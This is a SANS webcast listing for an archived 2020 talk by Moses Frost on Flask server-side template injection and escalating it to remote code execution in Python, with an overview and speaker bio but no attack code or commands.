Top Instructors Share Their Expertise ONLINE at SANS - Special Offers Available NOW!

Webcasts

To attend this webcast, login to your SANS Account or create your Account.

This webcast has been archived. To view the webcast login into your SANS Portal Account or create an account by clicking the "Get Registered" button on the right. Once you register, you can download the presentation slides below.

SEC642: Killing snakes for fun, Flask SSTIs and RCEs in Python

  • Monday, January 13, 2020 at 1:00 PM EST (2020-01-13 18:00:00 UTC)
  • Moses Frost

You can now attend the webcast using your mobile device!

  

Overview

Here is a word: Reflection. How many times have you read the words SSTI or even CSTI and wondered what they actually did, how they worked, or how to execute one? How can you take a file reading vulnerability like SSTI into a Remote Code Execution exploit? In this talk we will give you a glance into the SEC642 topic on Server Side Template Injection in Flask and taking that one concept a few steps further by introducing Python Method Reflection to execute code, and even backdoors. Join Moses Frost as he discusses this and other topics that are found in SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques.

Speaker Bio

Moses Frost

Moses Frost is a 20 year IT Veteran, having worked at Large Healthcare, Startups in Data and Data mining, FinTech, and Large Technology Companies like Cisco Systems. He has been an Incident Responder, Penetration Tester, IT Architect, and a Platform Engineer. He's spoken at various conferences in his tenure including DefCon and BSides. He is the Author of SEC588, Cloud Penetration Testing, and SEC642 Advanced Web Application Penetration Testing. He is the Author of SEC588, Cloud Penetration Testing, and SEC642 Advanced Web Application Penetration Testing.

Need Help? Visit our FAQ page or email webcast-support@sans.org.

Not able to attend a SANS webcast? All Webcasts are archived so you may view and listen at a time convenient to your schedule. View our webcast archive and access webcast recordings/PDF slides.